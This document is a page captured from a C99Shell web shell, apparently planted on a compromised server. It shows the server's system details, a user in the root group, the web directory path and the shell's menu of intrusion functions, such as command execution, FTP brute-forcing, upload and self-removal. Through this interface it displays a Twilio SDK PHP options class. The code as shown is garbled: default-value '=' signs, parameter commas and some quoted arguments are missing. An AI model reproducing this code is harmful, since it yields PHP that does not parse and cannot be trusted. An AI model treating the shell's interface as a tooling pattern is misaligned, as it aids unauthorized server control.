!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/wataxi.picotech.app/public_html/vendor/twilio/sdk/src/Twilio/Rest/FlexApi/V1/   drwxr-xr-x
Free 28.57 GB of 117.98 GB (24.22%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     InsightsQuestionnairesQuestionOptions.php (7.78 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * This code was generated by
 * \ / _    _  _|   _  _
 * | (_)\/(_)(_|\/| |(/_  v1.0.0
 * /       /
 */

namespace Twilio\Rest\FlexApi\V1;

use 
Twilio\Options;
use 
Twilio\Values;

/**
 * PLEASE NOTE that this class contains preview products that are subject to change. Use them with caution. If you currently do not have developer preview access, please contact help@twilio.com.
 */
abstract class InsightsQuestionnairesQuestionOptions {
    
/**
     * @param string $token The Token HTTP request header
     * @return CreateInsightsQuestionnairesQuestionOptions Options builder
     */
    
public static function create(string $token Values::NONE): CreateInsightsQuestionnairesQuestionOptions {
        return new 
CreateInsightsQuestionnairesQuestionOptions($token);
    }

    
/**
     * @param string $categoryId Category ID
     * @param string $question The question.
     * @param string $description The question description.
     * @param string $answerSetId The answer_set for question.
     * @param string $token The Token HTTP request header
     * @return UpdateInsightsQuestionnairesQuestionOptions Options builder
     */
    
public static function update(string $categoryId Values::NONEstring $question Values::NONEstring $description Values::NONEstring $answerSetId Values::NONEstring $token Values::NONE): UpdateInsightsQuestionnairesQuestionOptions {
        return new 
UpdateInsightsQuestionnairesQuestionOptions($categoryId$question$description$answerSetId$token);
    }

    
/**
     * @param string[] $categoryId List of category Ids
     * @param string $token The Token HTTP request header
     * @return ReadInsightsQuestionnairesQuestionOptions Options builder
     */
    
public static function read(array $categoryId Values::ARRAY_NONEstring $token Values::NONE): ReadInsightsQuestionnairesQuestionOptions {
        return new 
ReadInsightsQuestionnairesQuestionOptions($categoryId$token);
    }

    
/**
     * @param string $token The Token HTTP request header
     * @return DeleteInsightsQuestionnairesQuestionOptions Options builder
     */
    
public static function delete(string $token Values::NONE): DeleteInsightsQuestionnairesQuestionOptions {
        return new 
DeleteInsightsQuestionnairesQuestionOptions($token);
    }
}

class 
CreateInsightsQuestionnairesQuestionOptions extends Options {
    
/**
     * @param string $token The Token HTTP request header
     */
    
public function __construct(string $token Values::NONE) {
        
$this->options['token'] = $token;
    }

    
/**
     * The Token HTTP request header
     *
     * @param string $token The Token HTTP request header
     * @return $this Fluent Builder
     */
    
public function setToken(string $token): self {
        
$this->options['token'] = $token;
        return 
$this;
    }

    
/**
     * Provide a friendly representation
     *
     * @return string Machine friendly representation
     */
    
public function __toString(): string {
        
$options \http_build_query(Values::of($this->options), ''' ');
        return 
'[Twilio.FlexApi.V1.CreateInsightsQuestionnairesQuestionOptions ' $options ']';
    }
}

class 
UpdateInsightsQuestionnairesQuestionOptions extends Options {
    
/**
     * @param string $categoryId Category ID
     * @param string $question The question.
     * @param string $description The question description.
     * @param string $answerSetId The answer_set for question.
     * @param string $token The Token HTTP request header
     */
    
public function __construct(string $categoryId Values::NONEstring $question Values::NONEstring $description Values::NONEstring $answerSetId Values::NONEstring $token Values::NONE) {
        
$this->options['categoryId'] = $categoryId;
        
$this->options['question'] = $question;
        
$this->options['description'] = $description;
        
$this->options['answerSetId'] = $answerSetId;
        
$this->options['token'] = $token;
    }

    
/**
     * The ID of the category
     *
     * @param string $categoryId Category ID
     * @return $this Fluent Builder
     */
    
public function setCategoryId(string $categoryId): self {
        
$this->options['categoryId'] = $categoryId;
        return 
$this;
    }

    
/**
     * The question.
     *
     * @param string $question The question.
     * @return $this Fluent Builder
     */
    
public function setQuestion(string $question): self {
        
$this->options['question'] = $question;
        return 
$this;
    }

    
/**
     * The description for the question.
     *
     * @param string $description The question description.
     * @return $this Fluent Builder
     */
    
public function setDescription(string $description): self {
        
$this->options['description'] = $description;
        return 
$this;
    }

    
/**
     * The answer_set for the question.
     *
     * @param string $answerSetId The answer_set for question.
     * @return $this Fluent Builder
     */
    
public function setAnswerSetId(string $answerSetId): self {
        
$this->options['answerSetId'] = $answerSetId;
        return 
$this;
    }

    
/**
     * The Token HTTP request header
     *
     * @param string $token The Token HTTP request header
     * @return $this Fluent Builder
     */
    
public function setToken(string $token): self {
        
$this->options['token'] = $token;
        return 
$this;
    }

    
/**
     * Provide a friendly representation
     *
     * @return string Machine friendly representation
     */
    
public function __toString(): string {
        
$options \http_build_query(Values::of($this->options), ''' ');
        return 
'[Twilio.FlexApi.V1.UpdateInsightsQuestionnairesQuestionOptions ' $options ']';
    }
}

class 
ReadInsightsQuestionnairesQuestionOptions extends Options {
    
/**
     * @param string[] $categoryId List of category Ids
     * @param string $token The Token HTTP request header
     */
    
public function __construct(array $categoryId Values::ARRAY_NONEstring $token Values::NONE) {
        
$this->options['categoryId'] = $categoryId;
        
$this->options['token'] = $token;
    }

    
/**
     * The list of category IDs
     *
     * @param string[] $categoryId List of category Ids
     * @return $this Fluent Builder
     */
    
public function setCategoryId(array $categoryId): self {
        
$this->options['categoryId'] = $categoryId;
        return 
$this;
    }

    
/**
     * The Token HTTP request header
     *
     * @param string $token The Token HTTP request header
     * @return $this Fluent Builder
     */
    
public function setToken(string $token): self {
        
$this->options['token'] = $token;
        return 
$this;
    }

    
/**
     * Provide a friendly representation
     *
     * @return string Machine friendly representation
     */
    
public function __toString(): string {
        
$options \http_build_query(Values::of($this->options), ''' ');
        return 
'[Twilio.FlexApi.V1.ReadInsightsQuestionnairesQuestionOptions ' $options ']';
    }
}

class 
DeleteInsightsQuestionnairesQuestionOptions extends Options {
    
/**
     * @param string $token The Token HTTP request header
     */
    
public function __construct(string $token Values::NONE) {
        
$this->options['token'] = $token;
    }

    
/**
     * The Token HTTP request header
     *
     * @param string $token The Token HTTP request header
     * @return $this Fluent Builder
     */
    
public function setToken(string $token): self {
        
$this->options['token'] = $token;
        return 
$this;
    }

    
/**
     * Provide a friendly representation
     *
     * @return string Machine friendly representation
     */
    
public function __toString(): string {
        
$options \http_build_query(Values::of($this->options), ''' ');
        return 
'[Twilio.FlexApi.V1.DeleteInsightsQuestionnairesQuestionOptions ' $options ']';
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0166 ]--